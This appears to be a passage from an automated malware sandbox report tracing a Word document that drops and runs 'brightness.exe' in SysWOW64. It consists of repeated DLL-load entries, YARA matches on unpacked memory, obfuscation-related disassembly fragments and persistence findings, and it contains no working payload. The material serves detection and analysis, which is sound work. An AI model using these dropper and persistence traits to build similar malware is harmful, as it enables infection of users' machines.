            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 7.2.brightness.exe.22d65a8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.brightness.exe.28f0000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.brightness.exe.22d65a8.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3375169126.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3359324067.00000000022D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_02908798 LoadLibraryW,GetProcAddress,FreeLibrary,7_2_02908798
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0291D2FC push 0291D367h; ret 7_2_0291D35F
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028F32FC push eax; ret 7_2_028F3338
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028F635C push 028F63B7h; ret 7_2_028F63AF
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028F635A push 028F63B7h; ret 7_2_028F63AF
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0291D0AC push 0291D125h; ret 7_2_0291D11D
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0291D1F8 push 0291D288h; ret 7_2_0291D280
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0291D144 push 0291D1ECh; ret 7_2_0291D1E4
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_029086B8 push 029086FAh; ret 7_2_029086F2
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028F6738 push 028F677Ah; ret 7_2_028F6772
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028F6736 push 028F677Ah; ret 7_2_028F6772
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028FC4EC push ecx; mov dword ptr [esp], edx7_2_028FC4F1
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028FD520 push 028FD54Ch; ret 7_2_028FD544
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028FCB6C push 028FCCF2h; ret 7_2_028FCCEA
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0290788C push 02907909h; ret 7_2_02907901
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_029068C6 push 02906973h; ret 7_2_0290696B
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_029068C8 push 02906973h; ret 7_2_0290696B
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028FC9CE push 028FCCF2h; ret 7_2_028FCCEA
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0290E9E8 push ecx; mov dword ptr [esp], edx7_2_0290E9ED
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_02908910 push 02908948h; ret 7_2_02908940
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0290A917 push 0290A950h; ret 7_2_0290A948
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0290A918 push 0290A950h; ret 7_2_0290A948
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0290890E push 02908948h; ret 7_2_02908940
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_02902EE0 push 02902F56h; ret 7_2_02902F4E
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0291BFA0 push 0291C1C8h; ret 7_2_0291C1C0
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_02902FEB push 02903039h; ret 7_2_02903031
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_02902FEC push 02903039h; ret 7_2_02903031
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_02905DFC push ecx; mov dword ptr [esp], edx7_2_02905DFE

            Persistence and Installation Behavior

            barindex
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEExecutable created and started: C:\Windows\SysWOW64\brightness.exeJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to dropped file
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0290A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_0290A954
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
